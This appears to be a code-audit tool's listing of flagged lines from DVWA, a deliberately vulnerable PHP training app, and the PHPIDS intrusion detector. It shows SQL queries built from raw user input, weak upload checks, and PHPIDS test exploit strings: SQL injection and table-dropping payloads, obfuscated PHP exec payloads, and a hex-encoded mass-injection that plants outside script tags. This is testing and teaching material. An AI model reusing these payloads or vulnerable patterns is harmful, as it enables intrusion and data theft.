194:        $ip = ($_SERVER['SERVER_ADDR'] != '127.0.0.1') ?
195:                    $_SERVER['SERVER_ADDR'] :
196:                        (isset($_SERVER['HTTP_X_FORWARDED_FOR']) ?
197:                            $_SERVER['HTTP_X_FORWARDED_FOR'] :
198-                                 '127.0.0.1');
199-
200-        foreach ($result as $event) {
./external/phpids/0.6/docs/examples/cakephp/ids.php:205 (4/18) OK | Dubious | Bad | Hide 
202-                'Intrusion' => array(
203-                    'name'      => $event->getName(),
204-                    'value'     => stripslashes($event->getValue()),
205:                    'page'      => $_SERVER['REQUEST_URI'],
206-                    'userid'    => $user,
207-                    'session'   => session_id() ? session_id() : '0',
208-                    'ip'        => $ip,
./external/phpids/0.6/tests/IDS/MonitorTest.php:1025 (5/18) OK | Dubious | Bad | Hide 
1022-        $exploits[] = '" ; //
1023-                        if (!0) $_a ="". str_rot13(\'cevags\'); //
1024-                        $_b = HTTP_USER_AGENT; //
1025:                        $_c="". $_SERVER[$_b]; //
1026-                        $_a( `$_c` );//';
1027-        $exploits[] = '"; //
1028-                        $_c = "" . $_a($b);
./external/phpids/0.6/tests/IDS/MonitorTest.php:1035 (6/18) OK | Dubious | Bad | Hide 
1032-                        if  (!0) $_b = parse_str ; //
1033-                        $_c = "" . strrev("ftnirp");
1034-                        if  (!0)  $_d = QUERY_STRING; //
1035:                        $_e= "" . $_SERVER[$_d];
1036-                        $_b($_e); //
1037-                        $_f = "" . $_a($b);
1038-                        $_c(`$_f`);//';
./external/phpids/0.6/lib/IDS/Log/Composite.php:72 (7/18) OK | Dubious | Bad | Hide 
69-    public function execute(IDS_Report $data) 
70-    {
71-    	// make sure request uri is set right on IIS
72:        if (!isset($_SERVER['REQUEST_URI'])) {
73:            $_SERVER['REQUEST_URI'] = substr($_SERVER['PHP_SELF'], 1);
74:            if (isset($_SERVER['QUERY_STRING']) && $_SERVER['QUERY_STRING']) { 
75:                $_SERVER['REQUEST_URI'] .= '?' . $_SERVER['QUERY_STRING']; 
76-            } 
77-        } 
78-        
79-        // make sure server address is set right on IIS
80:        if (isset($_SERVER['LOCAL_ADDR'])) {
81:            $_SERVER['SERVER_ADDR'] = $_SERVER['LOCAL_ADDR'];
82-        } 
83-    	
84-        foreach ($this->loggers as $logger) {
./external/phpids/0.6/lib/IDS/Log/File.php:90 (8/18) OK | Dubious | Bad | Hide 
87-    {
88-
89-        // determine correct IP address
90:        if ($_SERVER['REMOTE_ADDR'] != '127.0.0.1') {
91:            $this->ip = $_SERVER['REMOTE_ADDR'];
92:        } elseif (isset($_SERVER['HTTP_X_FORWARDED_FOR'])) {
93:            $this->ip = $_SERVER['HTTP_X_FORWARDED_FOR'];
94-        }
95-
96-        $this->logfile = $logfile;
./external/phpids/0.6/lib/IDS/Log/File.php:163 (9/18) OK | Dubious | Bad | Hide 
160-                              $data->getImpact(),
161-                              join(' ', $data->getTags()),
162-                              trim($attackedParameters),
163:                              urlencode($_SERVER['REQUEST_URI']),
164:                              $_SERVER['SERVER_ADDR']);
165-
166-        return $dataString;
167-    }
./external/phpids/0.6/lib/IDS/Log/Email.php:167 (10/18) OK | Dubious | Bad | Hide 
164-        }
165-
166-        // determine correct IP address and concat them if necessary
167:        $this->ip = $_SERVER['REMOTE_ADDR'] .
168:            (isset($_SERVER['HTTP_X_FORWARDED_FOR']) ?
169:            ' (' . $_SERVER['HTTP_X_FORWARDED_FOR'] . ')' : '');
170-    }
171-
172-    /**
./external/phpids/0.6/lib/IDS/Log/Email.php:237 (11/18) OK | Dubious | Bad | Hide 
234-        * end deleting garbage files
235-        */
236-        $remoteAddr = $this->ip;
237:        $userAgent  = $_SERVER['HTTP_USER_AGENT'];
238-        $filename   = $this->file_prefix . md5($remoteAddr.$userAgent) . '.tmp';
239-        $file       = $dir . DIRECTORY_SEPARATOR . $filename;
240-
./external/phpids/0.6/lib/IDS/Log/Email.php:297 (12/18) OK | Dubious | Bad | Hide 
294-                       $data->getImpact(),
295-                       join(' ', $data->getTags()),
296-                       trim($attackedParameters),
297:                       urlencode($_SERVER['REQUEST_URI']),
298:                       $_SERVER['SERVER_ADDR']);
299-    }
300-
301-    /**
./external/phpids/0.6/lib/IDS/Log/Database.php:163 (13/18) OK | Dubious | Bad | Hide 
160-        }
161-
162-        // determine correct IP address
163:        if ($_SERVER['REMOTE_ADDR'] != '127.0.0.1') {
164:            $this->ip = $_SERVER['REMOTE_ADDR'];
165:        } elseif (isset($_SERVER['HTTP_X_FORWARDED_FOR'])) {
166:            $this->ip = $_SERVER['HTTP_X_FORWARDED_FOR'];
167-        }
168-
169-        try {
./external/phpids/0.6/lib/IDS/Log/Database.php:248 (14/18) OK | Dubious | Bad | Hide 
245-     */
246-    public function execute(IDS_Report $data) 
247-    {
248:        if (!isset($_SERVER['REQUEST_URI'])) {
249:            $_SERVER['REQUEST_URI'] = substr($_SERVER['PHP_SELF'], 1);
250:            if (isset($_SERVER['QUERY_STRING']) && $_SERVER['QUERY_STRING']) { 
251:                $_SERVER['REQUEST_URI'] .= '?' . $_SERVER['QUERY_STRING']; 
252-            } 
253-        }     	
254-
255-        foreach ($data as $event) {
256:            $page = isset($_SERVER['REQUEST_URI']) ? $_SERVER['REQUEST_URI'] : '';
257-            $ip   = $this->ip;
258-
259-            $this->statement->bindParam('name', $event->getName());
./external/phpids/0.6/lib/IDS/Log/Database.php:264 (15/18) OK | Dubious | Bad | Hide 
261-            $this->statement->bindParam('page', $page);
262-            $this->statement->bindParam('ip', $ip);
263-            $this->statement->bindParam('impact', $data->getImpact());
264:            $this->statement->bindParam('origin', $_SERVER['SERVER_ADDR']);
265-
266-            if (!$this->statement->execute()) {
267-
./dvwa/includes/dvwaPage.inc.php:139 (16/18) OK | Dubious | Bad | Hide 
136-
137-function dvwaPageReload() {
138-
139:	dvwaRedirect( $_SERVER[ 'PHP_SELF' ] );
140-
141-}
142-
./dvwa/includes/DBMS/PGSQL.php:56 (17/18) OK | Dubious | Bad | Hide 
53-dvwaMessagePush( "'users' table was created." );
54-
55-// Get the base directory for the avatar media...
56:$baseUrl = 'http://'.$_SERVER[ 'SERVER_NAME' ].$_SERVER[ 'PHP_SELF' ];
57-$stripPos = strpos( $baseUrl, 'dvwa/setup.php' );
58-$baseUrl = substr( $baseUrl, 0, $stripPos ).'dvwa/hackable/users/';
59-
./dvwa/includes/DBMS/MySQL.php:47 (18/18) OK | Dubious | Bad | Hide 
44-// Insert some data into users
45-
46-// Get the base directory for the avatar media...
47:$baseUrl = 'http://'.$_SERVER[ 'SERVER_NAME' ].$_SERVER[ 'PHP_SELF' ];
48-$stripPos = strpos( $baseUrl, 'dvwa/setup.php' );
49-$baseUrl = substr( $baseUrl, 0, $stripPos ).'dvwa/hackable/users/';
50-

$_COOKIE (13) Top | Hide

./vulnerabilities/csrf/index.php:15 (1/13) OK | Dubious | Bad | Hide 
13-
14-$vulnerabilityFile = '';
15:switch( $_COOKIE[ 'security' ] ) {
16-	case 'low':
17-		$vulnerabilityFile = 'low.php';
18-		break;
./vulnerabilities/fi/index.php:15 (2/13) OK | Dubious | Bad | Hide 
12-dvwaDatabaseConnect();
13-
14-$vulnerabilityFile = '';
15:switch( $_COOKIE['security'] ) {
16-	case 'low':
17-		$vulnerabilityFile = 'low.php';
18-		break;
./vulnerabilities/sqli_blind/index.php:15 (3/13) OK | Dubious | Bad | Hide 
12-dvwaDatabaseConnect();
13-
14-$vulnerabilityFile = '';
15:switch( $_COOKIE[ 'security' ] ) {
16-	case 'low':
17-		$vulnerabilityFile = 'low.php';
18-		break;
./vulnerabilities/brute/index.php:15 (4/13) OK | Dubious | Bad | Hide 
12-dvwaDatabaseConnect();
13-
14-$vulnerabilityFile = '';
15:switch( $_COOKIE[ 'security' ] ) {
16-	case 'low':
17-		$vulnerabilityFile = 'low.php';
18-		break;
./vulnerabilities/exec/index.php:15 (5/13) OK | Dubious | Bad | Hide 
12-dvwaDatabaseConnect();
13-
14-$vulnerabilityFile = '';
15:switch( $_COOKIE[ 'security' ] ) {
16-	case 'low':
17-		$vulnerabilityFile = 'low.php';
18-		break;
./vulnerabilities/upload/index.php:15 (6/13) OK | Dubious | Bad | Hide 
12-dvwaDatabaseConnect();
13-
14-$vulnerabilityFile = '';
15:switch( $_COOKIE[ 'security' ] ) {
16-	case 'low':
17-		$vulnerabilityFile = 'low.php';
18-		break;
./vulnerabilities/sqli/index.php:15 (7/13) OK | Dubious | Bad | Hide 
12-dvwaDatabaseConnect();
13-
14-$vulnerabilityFile = '';
15:switch( $_COOKIE[ 'security' ] ) {
16-	case 'low':
17-		$vulnerabilityFile = 'low.php';
18-		break;
./vulnerabilities/xss_s/index.php:15 (8/13) OK | Dubious | Bad | Hide 
12-dvwaDatabaseConnect();
13-
14-$vulnerabilityFile = '';
15:switch( $_COOKIE[ 'security' ] ) {
16-	case 'low':
17-		$vulnerabilityFile = 'low.php';
18-		break;
./vulnerabilities/xss_r/index.php:15 (9/13) OK | Dubious | Bad | Hide 
12-dvwaDatabaseConnect();
13-
14-$vulnerabilityFile = '';
15:switch( $_COOKIE[ 'security' ] ) {
16-	case 'low':
17-		$vulnerabilityFile = 'low.php';
18-		break;
./external/phpids/0.6/docs/examples/example.php:45 (10/13) OK | Dubious | Bad | Hide 
42-        'REQUEST' => $_REQUEST,
43-        'GET' => $_GET,
44-        'POST' => $_POST,
45:        'COOKIE' => $_COOKIE
46-    );
47-
48-    $init = IDS_Init::init(dirname(__FILE__) . '/../../lib/IDS/Config/Config.ini');
./dvwa/includes/dvwaPage.inc.php:28 (11/13) OK | Dubious | Bad | Hide 
25-
26-
27-// Set security cookie to high if no cookie exists
28:if (!isset($_COOKIE['security'])){
29-
30-	setcookie( 'security', 'high' );
31-
./dvwa/includes/dvwaPage.inc.php:170 (12/13) OK | Dubious | Bad | Hide 
167-
168-function dvwaSecurityLevelGet() {
169-
170:	return isset( $_COOKIE[ 'security' ] ) ? $_COOKIE[ 'security' ] : 'high';
171-
172-}
173-
./dvwa/includes/dvwaPhpIds.inc.php:60 (13/13) OK | Dubious | Bad | Hide 
57-			'REQUEST' => $_REQUEST,
58-			'GET' => $_GET,
59-			'POST' => $_POST,
60:			'COOKIE' => $_COOKIE
61-		);
62-
63-		$init = IDS_Init::init( DVWA_WEB_PAGE_TO_PHPIDS.'lib/IDS/Config/Config.ini' );

$_FILES (3) Top | Hide

./vulnerabilities/upload/source/low.php:5 (1/3) OK | Dubious | Bad | Hide 
3-
4-			$target_path = DVWA_WEB_PAGE_TO_ROOT."hackable/uploads/";
5:			$target_path = $target_path . basename( $_FILES['uploaded']['name']);
6-
7:			if(!move_uploaded_file($_FILES['uploaded']['tmp_name'], $target_path)) {
8-				
9-				$html .= '<pre>';
10-				$html .= 'Your image was not uploaded.';
./vulnerabilities/upload/source/high.php:5 (2/3) OK | Dubious | Bad | Hide 
2-if (isset($_POST['Upload'])) {
3-
4-			$target_path = DVWA_WEB_PAGE_TO_ROOT."hackable/uploads/";
5:			$target_path = $target_path . basename($_FILES['uploaded']['name']);
6:			$uploaded_name = $_FILES['uploaded']['name'];
7-			$uploaded_ext = substr($uploaded_name, strrpos($uploaded_name, '.') + 1);
8:			$uploaded_size = $_FILES['uploaded']['size'];
9-
10-			if (($uploaded_ext == "jpg" || $uploaded_ext == "JPG" || $uploaded_ext == "jpeg" || $uploaded_ext == "JPEG") && ($uploaded_size < 100000)){
11-
12-
13:				if(!move_uploaded_file($_FILES['uploaded']['tmp_name'], $target_path)) {
14-					
15-					$html .= '<pre>';
16-					$html .= 'Your image was not uploaded.';
./vulnerabilities/upload/source/medium.php:5 (3/3) OK | Dubious | Bad | Hide 
2-	if (isset($_POST['Upload'])) {
3-
4-			$target_path = DVWA_WEB_PAGE_TO_ROOT."hackable/uploads/";
5:			$target_path = $target_path . basename($_FILES['uploaded']['name']);
6:			$uploaded_name = $_FILES['uploaded']['name'];
7:			$uploaded_type = $_FILES['uploaded']['type'];
8:			$uploaded_size = $_FILES['uploaded']['size'];
9-
10-			if (($uploaded_type == "image/jpeg") && ($uploaded_size < 100000)){
11-
12-
13:				if(!move_uploaded_file($_FILES['uploaded']['tmp_name'], $target_path)) {
14-				
15-					$html .= '<pre>';
16-					$html .= 'Your image was not uploaded.';

SELECT (22) Top | Hide

./login.php:23 (1/22) OK | Dubious | Bad | Hide 
21-	$pass = md5( $pass );
22-
23:	$qry = "SELECT * FROM `users` WHERE user='$user' AND password='$pass';";
24-
25-	$result = @mysql_query($qry) or die('<pre>' . mysql_error() . '</pre>' );
26-
./vulnerabilities/csrf/source/high.php:16 (2/22) OK | Dubious | Bad | Hide 
13-		$pass_curr = md5( $pass_curr );
14-		
15-		// Check that the current password is correct
16:		$qry = "SELECT password FROM `users` WHERE user='admin' AND password='$pass_curr';";
17-		$result = mysql_query($qry) or die('<pre>' . mysql_error() . '</pre>' );
18-
19-		if (($pass_new == $pass_conf) && ( $result && mysql_num_rows( $result ) == 1 )){
./vulnerabilities/sqli_blind/source/low.php:9 (3/22) OK | Dubious | Bad | Hide 
6-	
7-	$id = $_GET['id'];
8-
9:	$getid = "SELECT first_name, last_name FROM users WHERE user_id = '$id'";
10-	$result = mysql_query($getid); // Removed 'or die' to suppres mysql errors
11-
12-	$num = @mysql_numrows($result); // The '@' character suppresses errors making the injection 'blind'
./vulnerabilities/sqli_blind/source/high.php:13 (4/22) OK | Dubious | Bad | Hide 
10-
11-	if (is_numeric($id)) {
12-
13:		$getid = "SELECT first_name, last_name FROM users WHERE user_id = '$id'";
14-		$result = mysql_query($getid); // Removed 'or die' to suppres mysql errors
15-
16-		$num = @mysql_numrows($result); // The '@' character suppresses errors making the injection 'blind'
./vulnerabilities/sqli_blind/source/medium.php:10 (5/22) OK | Dubious | Bad | Hide 
7-	$id = $_GET['id'];
8-	$id = mysql_real_escape_string($id);
9-
10:	$getid = "SELECT first_name, last_name FROM users WHERE user_id = $id";
11-	$result = mysql_query($getid); // Removed 'or die' to suppres mysql errors
12-	
13-	$num = @mysql_numrows($result); // The '@' character suppresses errors making the injection 'blind'
./vulnerabilities/brute/source/low.php:10 (6/22) OK | Dubious | Bad | Hide 
7-	$pass = $_GET['password'];
8-	$pass = md5($pass);
9-
10:	$qry = "SELECT * FROM `users` WHERE user='$user' AND password='$pass';";
11-	$result = mysql_query( $qry ) or die( '<pre>' . mysql_error() . '</pre>' );
12-
13-	if( $result && mysql_num_rows( $result ) == 1 ) {
./vulnerabilities/brute/source/high.php:16 (7/22) OK | Dubious | Bad | Hide 
13-	$pass = mysql_real_escape_string( $pass );
14-	$pass = md5( $pass );
15-
16:	$qry = "SELECT * FROM `users` WHERE user='$user' AND password='$pass';";
17-	$result = mysql_query($qry) or die('<pre>' . mysql_error() . '</pre>' );
18-
19-	if( $result && mysql_num_rows( $result ) == 1 ) {
./vulnerabilities/brute/source/medium.php:14 (8/22) OK | Dubious | Bad | Hide 
11-	$pass = mysql_real_escape_string( $pass );
12-	$pass = md5( $pass );
13-
14:	$qry = "SELECT * FROM `users` WHERE user='$user' AND password='$pass';";
15-	$result = mysql_query( $qry ) or die( '<pre>' . mysql_error() . '</pre>' );
16-
17-	if( $result && mysql_num_rows($result) == 1 ) {
./vulnerabilities/sqli/source/low.php:9 (9/22) OK | Dubious | Bad | Hide 
6-	
7-	$id = $_GET['id'];
8-
9:	$getid = "SELECT first_name, last_name FROM users WHERE user_id = '$id'";
10-	$result = mysql_query($getid) or die('<pre>' . mysql_error() . '</pre>' );
11-
12-	$num = mysql_numrows($result);
./vulnerabilities/sqli/source/high.php:13 (10/22) OK | Dubious | Bad | Hide 
10-
11-	if (is_numeric($id)){
12-
13:		$getid = "SELECT first_name, last_name FROM users WHERE user_id = '$id'";
14-		$result = mysql_query($getid) or die('<pre>' . mysql_error() . '</pre>' );
15-
16-		$num = mysql_numrows($result);
./vulnerabilities/sqli/source/medium.php:10 (11/22) OK | Dubious | Bad | Hide 
7-	$id = $_GET['id'];
8-	$id = mysql_real_escape_string($id);
9-
10:	$getid = "SELECT first_name, last_name FROM users WHERE user_id = $id";
11-
12-	$result = mysql_query($getid) or die('<pre>' . mysql_error() . '</pre>' );
13-
./external/phpids/0.6/tests/IDS/MonitorTest.php:605 (12/22) OK | Dubious | Bad | Hide 
602-        $exploits[] = '; DROP table Users --';
603-        $exploits[] = '/**/S/**/E/**/L/**/E/**/C/**/T * FROM users WHERE 1 = 1';
604-        $exploits[] = 'admin\'--';
605:        $exploits[] = 'SELECT /*!32302 1/0, */ 1 FROM tablename';
606-        $exploits[] = '10;DROP members --';
607:        $exploits[] = ' SELECT IF(1=1,\'true\',\'false\')';
608:        $exploits[] = 'SELECT CHAR(0x66)';
609:        $exploits[] = 'SELECT LOAD_FILE(0x633A5C626F6F742E696E69)';
610-        $exploits[] = 'EXEC(@stored_proc @param)';
611-        $exploits[] = 'chr(11)||chr(12)||char(13)';
612:        $exploits[] = 'MERGE INTO bonuses B USING (SELECT';
613-        $exploits[] = '1 or name like \'%\'';
614-        $exploits[] = '1 OR \'1\'!=0';
615-        $exploits[] = '1 OR ASCII(2) = ASCII(2)';
./external/phpids/0.6/tests/IDS/MonitorTest.php:909 (13/22) OK | Dubious | Bad | Hide 
906-        $exploits[] = "asd' union distinct(select null,password,null from users)--a ";
907-        $exploits[] = "asd' union distinct ( select null,password,(null)from user )-- a ";
908-        $exploits[] = 'DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x4445434C415245204054207661726368617228323535292C40432076617263686172283430303029204445434C415245205461626C655F437572736F7220435552534F5220464F522073656C65637420612E6E616D652C622E6E616D652066726F6D207379736F626A6563747320612C737973636F6C756D6E73206220776865726520612E69643D622E696420616E6420612E78747970653D27752720616E642028622E78747970653D3939206F7220622E78747970653D3335206F7220622E78747970653D323331206F7220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20657865632827757064617465205B272B40542B275D20736574205B272B40432B275D3D2727223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777302E646F7568756E716E2E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D27272B5B272B40432B275D20776865726520272B40432B27206E6F74206C696B6520272725223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777302E646F7568756E716E2E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D272727294645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F72%20AS%20CHAR(4000));EXEC(@S);';
909:        $exploits[] = "asaa';SELECT[asd]FROM[asd]";
910-        $exploits[] = "asd'; select [column] from users ";
911-        $exploits[] = "0x31 union select @@version,username,password from users ";
912-		$exploits[] = "1 order by if(1<2 ,uname,uid) ";
./external/phpids/0.6/lib/IDS/Caching/Database.php:151 (14/22) OK | Dubious | Bad | Hide 
148-
149-        $handle = $this->handle;
150-        
151:        $rows = $handle->query('SELECT created FROM `' . 
152-            $handle->quote($this->config['table']).'`');
153-            
154-        if (!$rows || $rows->rowCount() === 0) {
./external/phpids/0.6/lib/IDS/Caching/Database.php:186 (15/22) OK | Dubious | Bad | Hide 
183-
184-        try{
185-            $handle = $this->handle;
186:            $result = $handle->prepare('SELECT * FROM ' . 
187-                $handle->quote($this->config['table']) . 
188-                ' where type=?');
189-            $result->execute(array($this->type));
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier/Lexer/PH5P.php:1219 (16/22) OK | Dubious | Bad | Hide 
1216-    const IN_TBODY   = 7;
1217-    const IN_ROW     = 8;
1218-    const IN_CELL    = 9;
1219:    const IN_SELECT  = 10;
1220-    const AFTER_BODY = 11;
1221-    const IN_FRAME   = 12;
1222-    const AFTR_FRAME = 13;
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier/Lexer/PH5P.php:1391 (17/22) OK | Dubious | Bad | Hide 
1388-                case self::IN_TBODY:   return $this->inTableBody($token); break;
1389-                case self::IN_ROW:     return $this->inRow($token); break;
1390-                case self::IN_CELL:    return $this->inCell($token); break;
1391:                case self::IN_SELECT:  return $this->inSelect($token); break;
1392-                case self::AFTER_BODY: return $this->afterBody($token); break;
1393-                case self::IN_FRAME:   return $this->inFrameset($token); break;
1394-                case self::AFTR_FRAME: return $this->afterFrameset($token); break;
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier/Lexer/PH5P.php:2130 (18/22) OK | Dubious | Bad | Hide 
2127-                    $this->insertElement($token);
2128-
2129-                    /* Change the insertion mode to "in select". */
2130:                    $this->mode = self::IN_SELECT;
2131-                break;
2132-
2133-                /* A start or end tag whose tag name is one of: "caption", "col",
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier/Lexer/PH5P.php:3809 (19/22) OK | Dubious | Bad | Hide 
3806-            /* 4. If node is a select element, then switch the insertion mode to
3807-            "in select" and abort these steps. (innerHTML case) */
3808-            if($node->nodeName === 'select') {
3809:                $this->mode = self::IN_SELECT;
3810-                break;
3811-
3812-            /* 5. If node is a td or th element, then switch the insertion mode
./dvwa/includes/dvwaPage.inc.php:567 (20/22) OK | Dubious | Bad | Hide 
564-// XSS Stored guestbook function --
565-function dvwaGuestbook(){
566-
567:	$query  = "SELECT name, comment FROM guestbook";
568-	$result = mysql_query($query);
569-
570-	$guestbook = '';
./dvwa/includes/DBMS/DBMS.php:21 (21/22) OK | Dubious | Bad | Hide 
18- }
19- 
20- function db_login( $user,$pass )  {
21:  $login = "SELECT * FROM `users` WHERE user='$user' AND password='$pass';";
22-
23-	$result = @mysql_query($login) or die('<pre>' . mysql_error() . '</pre>' );
24-
./dvwa/includes/DBMS/DBMS.php:45 (22/22) OK | Dubious | Bad | Hide 
42- }
43- 
44- function db_login( $user,$pass ) {
45:    $login = "SELECT * FROM users WHERE username='$user' AND password='$pass';";
46-  
47-  $result = @pg_query( $login ) or die('<pre>' . pg_last_error() . '</pre>');
48-

INSERT (9) Top | Hide

./vulnerabilities/xss_s/source/low.php:16 (1/9) OK | Dubious | Bad | Hide 
14-   $name = mysql_real_escape_string($name);
15-  
16:   $query = "INSERT INTO guestbook (comment,name) VALUES ('$message','$name');";
17-   
18-   $result = mysql_query($query) or die('<pre>' . mysql_error() . '</pre>' );
19-
./vulnerabilities/xss_s/source/high.php:19 (2/9) OK | Dubious | Bad | Hide 
16-   $name = mysql_real_escape_string($name); 
17-   $name = htmlspecialchars($name);
18-  
19:   $query = "INSERT INTO guestbook (comment,name) VALUES ('$message','$name');";
20-   
21-   $result = mysql_query($query) or die('<pre>' . mysql_error() . '</pre>' );
22-
./vulnerabilities/xss_s/source/medium.php:18 (3/9) OK | Dubious | Bad | Hide 
15-   $name = str_replace('<script>', '', $name);
16-   $name = mysql_real_escape_string($name);
17-  
18:   $query = "INSERT INTO guestbook (comment,name) VALUES ('$message','$name');";
19-   
20-   $result = mysql_query($query) or die('<pre>' . mysql_error() . '</pre>' );
21-
./external/phpids/0.6/lib/IDS/Caching/Database.php:251 (4/9) OK | Dubious | Bad | Hide 
248-            $handle->query('TRUNCATE ' . 
249-                $this->config['table'].'');
250-            $statement = $handle->prepare('
251:                INSERT INTO `' . 
252-                $this->config['table'].'` (
253-                    type,
254-                    data,
./external/phpids/0.6/lib/IDS/Log/Database.php:177 (5/9) OK | Dubious | Bad | Hide 
174-            );
175-
176-            $this->statement = $this->handle->prepare('
177:                INSERT INTO ' . $this->table . ' (
178-                    name,
179-                    value,
180-                    page,
./dvwa/includes/DBMS/PGSQL.php:60 (6/9) OK | Dubious | Bad | Hide 
57-$stripPos = strpos( $baseUrl, 'dvwa/setup.php' );
58-$baseUrl = substr( $baseUrl, 0, $stripPos ).'dvwa/hackable/users/';
59-
60:$insert = "INSERT INTO users VALUES
61-	('1','admin','admin','admin',MD5('password'),'{$baseUrl}admin.jpg'),
62-	('2','Gordon','Brown','gordonb',MD5('abc123'),'{$baseUrl}gordonb.jpg'),
63-	('3','Hack','Me','1337',MD5('charley'),'{$baseUrl}1337.jpg'),
./dvwa/includes/DBMS/PGSQL.php:92 (7/9) OK | Dubious | Bad | Hide 
89-dvwaMessagePush( "'guestbook' table was created." );
90-
91-// Insert data into 'guestbook'
92:$insert = "INSERT INTO guestbook (comment, name) VALUES('This is a test comment.','admin')";
93-
94-if( !pg_query( $insert ) ){
95-	dvwaMessagePush( "Data could not be inserted into 'guestbook' table<br />SQL: " . pg_last_error() );
./dvwa/includes/DBMS/MySQL.php:51 (8/9) OK | Dubious | Bad | Hide 
48-$stripPos = strpos( $baseUrl, 'dvwa/setup.php' );
49-$baseUrl = substr( $baseUrl, 0, $stripPos ).'dvwa/hackable/users/';
50-
51:$insert = "INSERT INTO users VALUES
52-	('1','admin','admin','admin',MD5('password'),'{$baseUrl}admin.jpg'),
53-	('2','Gordon','Brown','gordonb',MD5('abc123'),'{$baseUrl}gordonb.jpg'),
54-	('3','Hack','Me','1337',MD5('charley'),'{$baseUrl}1337.jpg'),
./dvwa/includes/DBMS/MySQL.php:74 (9/9) OK | Dubious | Bad | Hide 
71-dvwaMessagePush( "'guestbook' table was created." );
72-	
73-// Insert data into 'guestbook'
74:$insert = "INSERT INTO guestbook VALUES
75-('1','This is a test comment.','test');";
76-	
77-if( !mysql_query( $insert ) ){

UPDATE (4) Top | Hide

./vulnerabilities/csrf/source/low.php:14 (1/4) OK | Dubious | Bad | Hide 
12-			$pass_new = md5($pass_new);
13-
14:			$insert="UPDATE `users` SET password = '$pass_new' WHERE user = 'admin';";
15-			$result=mysql_query($insert) or die('<pre>' . mysql_error() . '</pre>' );
16-						
17-			$html .= "<pre> Password Changed </pre>";
./vulnerabilities/csrf/source/high.php:23 (2/4) OK | Dubious | Bad | Hide 
20-			$pass_new = mysql_real_escape_string($pass_new);
21-			$pass_new = md5($pass_new);
22-
23:			$insert="UPDATE `users` SET password = '$pass_new' WHERE user = 'admin';";
24-			$result=mysql_query($insert) or die('<pre>' . mysql_error() . '</pre>' );
25-						
26-			$html .= "<pre> Password Changed </pre>";
./vulnerabilities/csrf/source/medium.php:16 (3/4) OK | Dubious | Bad | Hide 
13-				$pass_new = mysql_real_escape_string($pass_new);
14-				$pass_new = md5($pass_new);
15-
16:				$insert="UPDATE `users` SET password = '$pass_new' WHERE user = 'admin';";
17-				$result=mysql_query($insert) or die('<pre>' . mysql_error() . '</pre>' );
18-						
19-				$html .= "<pre> Password Changed </pre>";
./external/phpids/0.6/tests/IDS/MonitorTest.php:900 (4/4) OK | Dubious | Bad | Hide 
897-        $exploits[] = "aa aa'; DECLARE tablecursor CURSOR FOR select a.name as c,b.name as d,(null)from sysobjects a,syscolumns b
898-                        where a.id=b.id and a.xtype = ( 'u' ) and current_user = current_user
899-                        OPEN tablecursor FETCH NEXT FROM tablecursor INTO @a,@b WHILE(@a != null)
900:                        @query  = null+null+null+null+ ' UPDATE '+null+@a+null+ ' SET id=null,@b = @payload'
901-                        BEGIN EXEC sp_executesql @query
902-                        FETCH NEXT FROM tablecursor INTO @a,@b END
903-                        CLOSE tablecursor DEALLOCATE tablecursor;
904-                        and some text, to get pass the centrifuge; and some more text.";
905:        $exploits[] = "@query  = null+null+null+ ' UPDATE '+null+@a+ ' SET[  '+null+@b+ ' ]  = @payload'";
906-        $exploits[] = "asd' union distinct(select null,password,null from users)--a ";
907-        $exploits[] = "asd' union distinct ( select null,password,(null)from user )-- a ";
908-        $exploits[] = 'DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x4445434C415245204054207661726368617228323535292C40432076617263686172283430303029204445434C415245205461626C655F437572736F7220435552534F5220464F522073656C65637420612E6E616D652C622E6E616D652066726F6D207379736F626A6563747320612C737973636F6C756D6E73206220776865726520612E69643D622E696420616E6420612E78747970653D27752720616E642028622E78747970653D3939206F7220622E78747970653D3335206F7220622E78747970653D323331206F7220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20657865632827757064617465205B272B40542B275D20736574205B272B40432B275D3D2727223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777302E646F7568756E716E2E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D27272B5B272B40432B275D20776865726520272B40432B27206E6F74206C696B6520272725223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777302E646F7568756E716E2E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D272727294645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F72%20AS%20CHAR(4000));EXEC(@S);';

DELETE (1) Top | Hide

./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier/AttrValidator.php:102 (1/1) OK | Dubious | Bad | Hide 
100-                           );
101-            } else {
102:                // system never heard of the attribute? DELETE!
103-                $result = false;
104-            }
105-

DROP (7) Top | Hide

./external/phpids/0.6/tests/IDS/MonitorTest.php:602 (1/7) OK | Dubious | Bad | Hide 
600-        $exploits = array();
601-        $exploits[] = '" OR 1=1#';
602:        $exploits[] = '; DROP table Users --';
603-        $exploits[] = '/**/S/**/E/**/L/**/E/**/C/**/T * FROM users WHERE 1 = 1';
604-        $exploits[] = 'admin\'--';
605-        $exploits[] = 'SELECT /*!32302 1/0, */ 1 FROM tablename';
606:        $exploits[] = '10;DROP members --';
607-        $exploits[] = ' SELECT IF(1=1,\'true\',\'false\')';
608-        $exploits[] = 'SELECT CHAR(0x66)';
609-        $exploits[] = 'SELECT LOAD_FILE(0x633A5C626F6F742E696E69)';
